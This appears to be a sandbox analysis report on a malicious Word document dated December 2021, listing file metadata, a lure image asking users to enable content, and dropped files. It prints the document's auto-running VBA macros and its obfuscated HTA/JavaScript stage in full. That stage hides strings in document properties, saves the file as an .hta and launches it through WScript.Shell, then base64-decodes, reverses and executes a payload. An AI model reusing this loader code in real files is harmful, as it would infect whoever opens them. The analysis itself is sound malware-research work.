Malicious
Classifications
-
Threat Names
Mal/Generic-S
Dynamic Analysis Report
Created on 2021-12-31T11:49:00
ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0.doc
Word Document
Remarks (1/1)
(0x0200000E): The overall sleep time of all monitored processes was truncated from "1 hour" to "20 seconds" to reveal dormant functionality.
This is a filtered view
This list contains only the embedded files, downloaded files, and dropped files
Filters: |
There are no files for this filter
There are no files in this analysis
File Name | Category | Type | Verdict | Actions |
---|
C:\Users\kEecfMwgj\Desktop\ecd84fa8d836d5057149b2b3a048d75004ca1a1377fcf2f5e67374af3a1161a0.doc | Sample File | Word Document |
malicious
|
...
|
»
File Reputation Information
»
Verdict |
malicious
|
Names | Mal/Generic-S |
Office Information
»
Category | explorer |
Description | ta |
Last Modified By | Пользователь Windows |
Revision | 2 |
Create Time | 2021-12-27 11:02:00+00:00 |
Modify Time | 2021-12-27 11:02:00+00:00 |
Codepage | ANSI_Cyrillic |
Application | Microsoft Office Word |
App Version | 16.0 |
Template | Normal |
Company | ript.sh |
Document Security | NONE |
Page Count | 1 |
Line Count | 65 |
Paragraph Count | 1 |
Word Count | 116 |
Character Count | 16118 |
Chars With Spaces | 16233 |
bytes | 26624 |
scale_crop | False |
shared_doc | False |
Controls (1)
»
CLSID | Control Name | Associated Vulnerability |
---|---|---|
{00020906-0000-0000-C000-000000000046} | Word97 | - |
VBA Macros (2)
»
Macro #1: ThisDocument
»
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function contents()
With ActiveDocument.Content
superI7Center = .Find.Execute(FindText:="s3x", ReplaceWith:="", Replace:=2)
End With
End Function
Function cont1(i7ComputerMonitor)
cont1 = ActiveDocument.BuiltInDocumentProperties(i7ComputerMonitor).Value
contents
End Function
Public Function srn1(mouseVideo)
CreateObject("wsc" + cont1("company") + "ell").exec cont1("category") + " " + mouseVideo
End Function
Sub Document_Open()
hny
End Sub
Macro #2: main
»
Attribute VB_Name = "main"
Public Sub hny()
processorI9 = Trim("i7Gigabyte.h" & ThisDocument.cont1("comments"))
ActiveDocument.SaveAs2 FileName:=processorI9, FileFormat:=2
ThisDocument.srn1 processorI9
End Sub
Document Content Snippet
»
<s3xhs3xts3xms3xls3x>s3x<s3xbs3xos3xds3xys3x>s3x<s3xps3x s3xis3xds3x=s3x's3xps3xrs3xos3xcs3xes3xss3xss3xos3xrs3xRs3xts3xxs3x's3x s3xss3xts3xys3xls3xes3x=s3x's3xfs3xos3xns3xts3x-s3xcs3xos3xls3xos3xrs3x:s3x s3x#s3x0s3x0s3x0s3x's3x>s3xes3xvs3xas3xls3x<s3x/s3xps3x>s3x<s3xps3x s3xis3xds3x=s3x's3xrs3xts3xxs3xIs3x7s3x's3x s3xss3xts3xys3xls3xes3x=s3x's3xfs3xos3xns3xts3x-s3xcs3xos3xls3xos3xrs3x:s3x s3x#s3x0s3x0s3x0s3x's3x>s3xfs3xXs3x1s3x7s3xKs3xWs3xUs3xos3xas3xGs3xNs3x0s3xYs3xWs3xNs3x9s3xOs3x2s3xVs3xzs3xbs3x2s3xxs3xjs3xLs3xns3xhs3x0s3xUs3xms3x9s3xls3xZs3xGs3xls3xWs3xZs3xWs3xxs3xis3xYs3xXs3xQs3x7s3xKs3xTs3xIs3xgs3xLs3xCs3xJs3xns3xcs3xGs3xos3xus3xNs3x0s3xls3xls3xds3xHs3xls3xis3xYs3xWs3xds3xps3xZs3x1s3xxs3xcs3xYs3x2s3xls3xss3xYs3xns3xVs3xws3xXs3xFs3xxs3xzs3xcs3xms3xVs3xzs3xds3xVs3xxs3xcs3xOs3xms3xMs3xis3xKs3xGs3xVs3xss3xas3xWs3xZs3xvs3xds3xGs3xVs3x2s3xYs3xXs3xMs3xus3xes3xHs3xRs3xSs3xbs3x2s3xVs3xks3xas3xVs3xZs3xls3xbs3xGs3xJs3xhs3xds3xD ... |
Extracted Image Texts (1)
»
Image 1: 0.PNG
»
This document created in previous version of Hicrosoft Office Word
To view or edit this document. please click “Enable editing” button
on the top bar. and then click “Enable content”
CFB Streams (16)
»
Name | ID | Size | Actions |
---|---|---|---|
Root\Data | 1 | 26.02 KB |
...
|
Root\Table | 2 | 7.05 KB |
...
|
Root\WordDocument | 3 | 19.06 KB |
...
|
Root\SummaryInformation | 4 | 4.00 KB |
...
|
Root\DocumentSummaryInformation | 5 | 4.00 KB |
...
|
Root\Macros\VBA\ThisDocument | 8 | 2.36 KB |
...
|
Root\Macros\VBA\__SRP_2 | 9 | 983 Bytes |
...
|
Root\Macros\VBA\__SRP_3 | 10 | 364 Bytes |
...
|
Root\Macros\VBA\main | 11 | 1.08 KB |
...
|
Root\Macros\VBA\_VBA_PROJECT | 12 | 2.83 KB |
...
|
Root\Macros\VBA\dir | 13 | 553 Bytes |
...
|
Root\Macros\VBA\__SRP_0 | 14 | 1.67 KB |
...
|
Root\Macros\VBA\__SRP_1 | 15 | 241 Bytes |
...
|
Root\Macros\PROJECTwm | 16 | 56 Bytes |
...
|
Root\Macros\PROJECT | 17 | 398 Bytes |
...
|
Root\CompObj | 18 | 114 Bytes |
...
|
c:\users\keecfmwgj\documents\~wrd0000.tmp | Dropped File | HTML |
clean
|
...
|
»
Extracted JavaScripts (4)
»
JavaScript #1
»
function centerAsusSuper(i9I9Table){return(new ActiveXObject(i9I9Table));}function cardI9Processor(i9VideoMouse){return(tableNotebook.getElementById(i9VideoMouse).innerHTML);}function i7ProcessorCard(processorAsus){return('cha' + processorAsus);}function tableI9I9(processorMonitorSuper){var notebookProcessor = cardI9Processor('notebookGigabyteGigabyte');var videoSuper = "";var superProcessorI9, cardKeyboard, computerComputerSuper;var notebookMouseComputer, gigabyteTableComputer, processorGigabyte, tableCenter;var cardRtxCard = 0;processorMonitorSuper = processorMonitorSuper.replace(/[^A-Za-z0-9\+\/\=]/g, "");while(cardRtxCard < processorMonitorSuper.length){notebookMouseComputer = notebookProcessor.indexOf(processorMonitorSuper.charAt(cardRtxCard++));gigabyteTableComputer = notebookProcessor.indexOf(processorMonitorSuper.charAt(cardRtxCard++));processorGigabyte = notebookProcessor.indexOf(processorMonitorSuper.charAt(cardRtxCard++));tableCenter = notebookProcessor.indexOf(processorMonitorSuper.charAt(cardRtxCard++));superProcessorI9 = (notebookMouseComputer << 2) | (gigabyteTableComputer >> 4);cardKeyboard = ((gigabyteTableComputer & 15) << 4) | (processorGigabyte >> 2);computerComputerSuper = ((processorGigabyte & 3) << 6) | tableCenter;videoSuper = videoSuper + String.fromCharCode(superProcessorI9);if(processorGigabyte != 64){videoSuper = videoSuper + String.fromCharCode(cardKeyboard);}if(tableCenter != 64){videoSuper = videoSuper + String.fromCharCode(computerComputerSuper);}}return(videoSuper);}function i7AsusVideo(i7Processor){return i7Processor.split('').reverse().join('');}function monitorMonitorRtx(processorAsus){return(i7AsusVideo(tableI9I9(processorAsus)));}function asusProcessorMonitor(processorAsus, centerNotebook){return(processorAsus.split(centerNotebook));}cardTableMonitor = window;tableNotebook = document;cardTableMonitor['moveTo'](-101, -102);var tableRtx = cardI9Processor('rtxI7').split("---");var cardComputerMonitor = monitorMonitorRtx(tableRtx[0]);var rtxI7Super = monitorMonitorRtx(tableRtx[1]);
JavaScript #2
»
function rtxVideo(processorProcessorVideo){cardTableMonitor[cardI9Processor('processorRtx')](processorProcessorVideo);}
JavaScript #3
»
Call rtxVideo(cardComputerMonitor) : Call rtxVideo(rtxI7Super)
JavaScript #4
»
cardTableMonitor['close']();
c:\users\keecfmwgj\appdata\local\microsoft\windows\temporary internet files\content.word\~wrd0003.doc | Dropped File | Unknown |
clean
|
...
|
»
c:\users\keecfmwgj\documents\~$gigabyte.hta | Dropped File | Stream |
clean
|
...
|
»